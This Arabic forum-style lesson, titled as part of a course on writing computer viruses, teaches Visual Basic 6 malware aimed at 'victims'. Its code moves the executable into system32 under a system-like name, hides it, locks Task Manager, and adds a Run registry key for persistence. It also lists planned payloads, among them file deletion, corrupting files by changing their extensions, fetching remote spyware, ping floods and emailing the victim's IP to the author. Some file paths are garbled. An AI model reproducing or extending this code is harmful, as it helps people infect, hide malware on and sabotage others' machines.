)]°@°[(دورة شاملة حول الفايروسات من البداية الى الاحتراف)]°@ )[°

الدرس السابع

دي جزء خاص قمت بتعديلة علي الدورة
والادوات المطلوبه هي
1- فيجول بيسك 6
2- الذكاء والحيل البرمجيه
3- الريجتسري ( يجب ان تعرف كيف تتعامل معه )

================================================== =======
اولا: الفايروس يعتمد على المراوغه والاختفاء عند تشغيله
وهناك شفرات تقوم بهذه المهمه مثلا
انت تريد عندما يضغط الضحيه على الفايرس تريد ان يختفي وينتقل الي ملف انت تحدده بالشفره البرمجيه
اذا هذا هو الكود

كود PHP:
Name App.Path & "\" & App.EXEName & ".exe" As "c:windowssystem32sysstem.exe"

ماذا فهمت من الكود
طبعا نحن استخدمنا app.path وهذه داله تقوم بتحديد مكان البرنامج (الفايروس) بدون كتابة مساره
يعني لو فرضا كتبنا داله name بهذه الطريقه name c":\virus.exe" as "c:\windows\system32\system.exe"
كذا خطأ لان احتمال الضحيه شغل الفايروس على سطح المكتب او شغله في ملف الوينزوب كذا مراح يشتغل الفايروس
لان نحن كتبنا بالشفره انقل الملف من c:\virus.exe الي c:\windows\system32\system.exe
ولذلك استخدمنا داله app.path تحديد مكان الملف تلقائي بدون كتابة مساره
يعني بذا الطريقه رايح يشتغل الفايروس باي مكان في الجهاز وهذا هو المطلوب
داله name هي داله تقوم على نقل الملف الي اي مكان انت تحدده
نحن قمنا بنقل الملف عند الضغط عليه الي دليل الويندوز ثم الي system32 وتغيير اسمه الي system
حتى عندما يراه الضحيه يحسبه ملف تابع لنظام
================================================== =======
طيب حن الان انتهنا من اول خاصيه للفايروس وهي خاصية التنقل
الان نريد ان نحمي ملف الفايروس من الظهور يعني نبغاه متخفى غير مرئي
نستخدم داله setattr وهذه الداله تقوم بتغيير في خصائص الملف
vbshow تعني اظهر الملف
vbHidden تجعل الملف مخفي
بالعربي انا اعتبر هذه الاخصائص اهم شي ويوجد هناك خصائص اخرى لكن ماتهمنا
طيب كيف نكتب الداله ونستعمل الخصائص
بعد ماكتبنا الكود الاول وهو كود انتقال الفايروس الي مجلد system32
نكتب كود الاختفاء تحته بالضبط
setattr "c:\windows\system32\system.exe",vbHidden
لو شرحنا الكودان يكونا على النحو التالي
قم بنقل الملف virus.exe من مكان وجوده الي مجلد system32 وغير اسمه الي system.exe
الكود الثاني قم باخفاء الملف اللى موجود في مجلد system32 واللي اسمه system.exe
طبعا الان نحن جعلنا الفايروس يتمتع بخصائص الانتقال والتخفى
على فكره اي ملف يستخدم كود الاختفاء لن يستطيع البحث اللي في جهازك كشفه او اظهاره
لن الويندوز يعطي حرية الملف باالاختفاء وبذلك يعطل خاصية البحث عنه
================================================== =======
الان ناتي الي مهمه الفايروس ماذا نريد ان يعمل الفايروس
هناك عدة امور تخبربها الفايروس ليقوم بها
1- اعادة تشغيل الجهاز
2- حذف ملفات معينه
3- عمل فرومات للجهاز .................. هذا لا انصح به نحن نريد ان نصنع فايروس له طابع خاص
يعني نريد ان نصنع فايروس له مهمات مميزه يعرف بها ويشتهر بها عند العامه
4- ايقاف عمل بعض البرامج التي تحمل امتداد exe اوcom او htm او html او gif وهكذا
5- الهجوم على ملفات وتخريبها ( اي تغيير امتدادها حتى لاتعمل ) مثل الهجوم على الصور بامتداد gif وتحويلها الي
امتداد txt او اي امتداد اخر
5- عمل فقط رساله تظهر قبل شاشة الترحيب
6- عمل فايروس يقوم باستخدام الدوس وتشغيل بعض اوامره مثل امر ping لضرب المواقع
7- استخدام الفايروس ب ملفات تجسس من الانترنت او استدعاء باتش لك من موقعك الخاص وتشغيله في جهاز الضحيه
8- التحكم في بعض برامج النظام وايقافها مثل ايقاف قائمة المهام وغيرها من البرامج المهمه
9- اخفاء محركات الاقراص السي الدي المرن الفلاش مموري والسدي
10 - عمل اشياء ازعاجيه مثل فتح مجلدات فتح برامج وهكذا
11- عمل تسجيل خروج من الماسينجر او التلاعب في حالات الاتصال
12- عمل رقم سري للجهاز لمنع الضحيه لدخول لسطح المكتب
13- ارسال الفايروس رساله لنا على بريدنا يخبرنا بتشغيل الضحيه للفايروس مع عرض الاي بي ووقت تشغيله وتاريخه
كل هذه الاشياء سوف اشرحها مع بعض الخدع في تشغيل الفايروس بدون ان يضغط عليه الضحيه
اتمنى قرات الدرس جيد حتى ابدأ بالدرس الثاني والذي سوف يقدم اشياء جديده لك ومفيده وبعض الخدع والحيل
سوف ابدا الان بعمل شفرات توقف اي برنامج تابع لنظام بايقاف الفايروس
وخلونا نبدأ الان بايقاف قائمة المهام و لن تعمل اذا ضغطت على مفاتيح ctrl+atl+del
اذا دعونا نصنع كود يخلي النظام يظهر رساله بان قائمة المهام مشغوله مع برنامج اخر وبكذا منعنا المستخدم من فتحها

كود PHP:
Open "C:\WINDOWS\system32\taskmgr.exe" For Input Lock Read As 1

الان نحن منعنا المستخدم من فتح قائمة المهام واذا حاول فتحها سوف تظهر رسالة من النظام تقول هذا البرنامج مستخدم
من قبل برنامج اخر
طبعا الكود هذا سوف تضعه في form_load
مع وضع كود يقوم على تشغيل الفايروس في كل مره شغل الضحيه جهازه
وهذا كود تشغيل الفايروس مع تشغيل الجهاز

كود PHP:
Set O = CreateObject("WScript.Shell")
O.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Run\ProgramName", "c:\WINDOWS\system32\system.exe", "REG_SZ"< /STRONG >

اذا دعونا الان نجمع الاكواد اللي عملناه ونضعها في form_load

كود PHP:
Private Sub Form_Load()
Set O = CreateObject("WScript.Shell")
O.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Run\ProgramName", "c:\WINDOWS\system32\system.exe", "REG_SZ"
Form1.Hide
Name App.Path & "\" & App.EXEName & ".exe" As "c:WINDOWSsystem32system.exe"
SetAttr "c:WINDOWSsystem32system.exe", vbHidden
Open "C:WINDOWSsystem32taskmgr.exe" For Input Lock Read As 1
End Sub<
/STRONG >

دعونا نشرح عمل الاكواد بالتفصيل
(يتبع)